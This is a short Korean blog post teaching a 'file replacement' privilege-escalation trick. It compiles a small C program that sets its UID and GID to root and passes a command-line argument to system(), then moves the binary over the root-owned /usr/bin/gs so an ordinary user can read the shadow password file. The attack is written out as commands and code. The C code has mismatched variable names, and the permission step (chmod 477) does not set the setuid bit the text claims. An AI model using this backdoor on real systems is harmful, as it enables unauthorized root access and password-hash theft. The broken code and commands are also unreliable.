1. 파일교체 기법
- 만약 gcc-c++이 설치되어 있고, 사용권한이 아무에게나 있다면 서버에 들어와서 간단한 스크립트 등을 통해서
컴파일해서 해킹이 가능하다.
[+]실습
- gcc-c++ 설치
> dnf -y install gcc-c++
- c파일 만들기 (hack.c)
#include <stdio.h>
main (int argc, char * argv[]){
char ecrc[199];
setuid(0);
setgid(0);
sprintf(ecec, argv[1]);
system(exec);
}
- gcc hack.c -o hackk
- chmod 477 hackk 로 UID를 설정해 줌
- 루트 소유의 755 권한을 가진 파일을 찾아 변경하려고 함(임의)
- 변경할 파일을 찾고(ls -l /usr/bin/gs)
- mv hackk /usr/bin/gs
- ll /usr/bin/gs
- 이 상태에서 일반 유저인 상태에서 변경된 파일(UID)가 설정되어 있어서 일반 사용자도 shadow파일을 읽을 수 있다.
'소소한 IT이야기' 카테고리의 다른 글
| [M2 Mac] Windows server 2019 install (feat. UTM) (2) | 2023.04.09 |
|---|---|
| [CentOS_9]OpenVPN 서버 및 클라이언트 설정(feat. user-auth) (1) | 2023.02.04 |
| NFT 뜻 NFT는 무엇인가?? (feat. NFT 장단점) (2) | 2022.05.22 |
